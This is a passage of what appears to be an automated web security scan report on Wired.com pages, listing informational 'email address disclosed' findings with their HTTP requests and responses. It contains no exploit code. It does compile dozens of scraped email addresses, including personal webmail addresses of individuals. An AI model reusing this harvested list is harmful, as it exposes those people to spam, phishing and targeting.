<a href="mailto:johnb@geekdad.com">
...[SNIP]...
<a href="mailto:kathy@geekdad.com">
...[SNIP]...
<a href="mailto:doug@geekdad.com">
...[SNIP]...
<a href="mailto:dand@geekdad.com">
...[SNIP]...
<a href="mailto:paul@geekdad.com">
...[SNIP]...
<a href="mailto:michael@geekdad.com">
...[SNIP]...
<a href="mailto:jason@geekdad.com">
...[SNIP]...
<a href="mailto:corrina@geekdad.com">
...[SNIP]...
<a href="mailto:chuck@geekdad.com">
...[SNIP]...
<a href="mailto:jonathan@geekdad.com">
...[SNIP]...
<a href="mailto:brad@geekdad.com">
...[SNIP]...
<a href="mailto:russ@geekdad.com">
...[SNIP]...
<a href="mailto:anton@geekdad.com">
...[SNIP]...
<a href="mailto:curtis@geekdad.com">
...[SNIP]...
<a href="mailto:tony@geekdad.com">
...[SNIP]...
<a href="mailto:jenny@geekdad.com">
...[SNIP]...
<a href="mailto:z@geekdad.com">
...[SNIP]...

7.15. http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 05:28:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=447
Expires: Wed, 12 Jan 2011 15:47:21 GMT
Date: Wed, 12 Jan 2011 15:39:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:fitzwillie@me.com">
...[SNIP]...
<a href="mailto:ken@geekdad.com">
...[SNIP]...
<a href="mailto:matt@geekdad.com">
...[SNIP]...
<a href="mailto:canderson@wiredmag.com">
...[SNIP]...
<a href="mailto:john@geekdad.com">
...[SNIP]...
<a href="mailto:dave@geekdad.com">
...[SNIP]...
<a href="mailto:natania@geekdad.com">
...[SNIP]...
<a href="mailto:nathan@geekdad.com">
...[SNIP]...
<a href="mailto:johnb@geekdad.com">
...[SNIP]...
<a href="mailto:kathy@geekdad.com">
...[SNIP]...
<a href="mailto:doug@geekdad.com">
...[SNIP]...
<a href="mailto:dand@geekdad.com">
...[SNIP]...
<a href="mailto:paul@geekdad.com">
...[SNIP]...
<a href="mailto:michael@geekdad.com">
...[SNIP]...
<a href="mailto:jason@geekdad.com">
...[SNIP]...
<a href="mailto:corrina@geekdad.com">
...[SNIP]...
<a href="mailto:chuck@geekdad.com">
...[SNIP]...
<a href="mailto:jonathan@geekdad.com">
...[SNIP]...
<a href="mailto:brad@geekdad.com">
...[SNIP]...
<a href="mailto:russ@geekdad.com">
...[SNIP]...
<a href="mailto:anton@geekdad.com">
...[SNIP]...
<a href="mailto:curtis@geekdad.com">
...[SNIP]...
<a href="mailto:tony@geekdad.com">
...[SNIP]...
<a href="mailto:jenny@geekdad.com">
...[SNIP]...
<a href="mailto:z@geekdad.com">
...[SNIP]...

7.16. http://www.wired.com/js/videos/MobileCompatibility.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /js/videos/MobileCompatibility.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/videos/MobileCompatibility.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 15:11:05 GMT
Date: Wed, 12 Jan 2011 15:01:05 GMT
Connection: close
Content-Length: 25629

/**
* Copyright (C) 2005 Brightcove, Inc. All Rights Reserved. No
* use, copying or distribution of this work may be made except in
* accordance with a valid license agreement from Brightcove,
...[SNIP]...
*******************************/
/**********************************************************************************************************************/

// JavaScript Document

// Anthony Hand, ahand@hand-interactive.com
// Web: www.hand-interactive.com
//
// License info: http://creativecommons.org/licenses/by/3.0/us/

//Initialize some initial string variables we'll look for later.
var deviceIphone = "iphone"
...[SNIP]...

7.17. http://www.wired.com/magazine/decode/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /magazine/decode/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /magazine/decode/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:04:48 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=446
Expires: Wed, 12 Jan 2011 15:46:19 GMT
Date: Wed, 12 Jan 2011 15:38:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:diszaster@gmail.com">
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:mandersen@argn.com">
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:mandersen@argn.com">
...[SNIP]...
<a href="mailto:britadagostino@yahoo.com">
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:mike@lonesharkgames.com">
...[SNIP]...
<a href="decodewired@gmail.com">decodewired@gmail.com</a>
...[SNIP]...
<a href="decodewired@gmail.com">decodewired@gmail.com</a>
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:drsudoku@gmail.com">
...[SNIP]...
<a href="mailto:cbaker@wired.com">
...[SNIP]...
<a href="mailto:mike@lonesharkgames.com">
...[SNIP]...
<a href="mailto:teeuwynn@lonesharkgames.com">
...[SNIP]...

7.18. http://www.wired.com/playbook/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /playbook/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /playbook/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:03:45 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=394
Expires: Wed, 12 Jan 2011 15:46:29 GMT
Date: Wed, 12 Jan 2011 15:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:joe@joelindsey.com">
...[SNIP]...
<a href="mailto:kyle.stack@gmail.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:erik_malinowski@wired.com">
...[SNIP]...
<a href="mailto:mark_mcclusky@wired.com">
...[SNIP]...
<a href="mailto:brian.mossop@gmail.com">
...[SNIP]...
<a href="mailto:kyle.stack@gmail.com">
...[SNIP]...
<a href="mailto:joe@joelindsey.com">
...[SNIP]...

7.19. http://www.wired.com/rawfile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /rawfile/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /rawfile/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:25:24 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:56 GMT
Date: Wed, 12 Jan 2011 15:39:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 167807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:mattcalifornia@hotmail.com">
...[SNIP]...
<a href="mailto:mattcalifornia@hotmail.com">
...[SNIP]...
<a href="mailto:mattcalifornia@hotmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:heybobg@mac.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...
<a href="mailto:keith@wired.com">
...[SNIP]...
<a href="mailto:James_Merithew@wired.com">
...[SNIP]...
<a href="mailto:jon_snyder@wired.com">
...[SNIP]...
<a
href="mailto:matthew_shechmeister@yahoo.com">
...[SNIP]...
<a href="mailto:lovebryan@gmail.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:blaark@gmail.com">
...[SNIP]...
<a href="mailto:twigabrook@gmail.com">
...[SNIP]...

7.20. http://www.wired.com/thisdayintech/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /thisdayintech/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /thisdayintech/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:01:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:12 GMT
Date: Wed, 12 Jan 2011 15:40:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:randy_alfred@wired.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:randy_alfred@wired.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:randy_alfred@wired.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...
<a href="mailto:alittlechinmusic@yahoo.com">
...[SNIP]...

7.21. http://www.wired.com/threatlevel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:21:59 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:27:52 GMT
Date: Wed, 12 Jan 2011 15:27:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.22. http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2006/04/reporter_vs_sub/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/2006/04/reporter_vs_sub/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 10:06:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=600
Expires: Wed, 12 Jan 2011 15:37:41 GMT
Date: Wed, 12 Jan 2011 15:27:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 68707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.23. http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2010/12/hacking-the-hacker-stereotypes/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/2010/12/hacking-the-hacker-stereotypes/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 11:38:31 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=32
Expires: Wed, 12 Jan 2011 15:33:15 GMT
Date: Wed, 12 Jan 2011 15:32:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.24. http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2010/12/transcending-the-human-diy-style/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/2010/12/transcending-the-human-diy-style/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:54 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=51
Expires: Wed, 12 Jan 2011 15:33:23 GMT
Date: Wed, 12 Jan 2011 15:32:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.25. http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2010/12/wiki-style-mapping-heads-to-sea/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/2010/12/wiki-style-mapping-heads-to-sea/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 10:48:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=39
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:32:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.26. http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/birgitta-jonsdottir/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/2011/01/birgitta-jonsdottir/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:07:14 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=382
Expires: Wed, 12 Jan 2011 15:33:31 GMT
Date: Wed, 12 Jan 2011 15:27:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.27. http://www.wired.com/threatlevel/2011/01/codebreakers-death/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/codebreakers-death/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/2011/01/codebreakers-death/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:44:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=380
Expires: Wed, 12 Jan 2011 15:33:31 GMT
Date: Wed, 12 Jan 2011 15:27:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.28. http://www.wired.com/threatlevel/2011/01/dubai-assassination/  previous  next

Summary

Severity:   Information
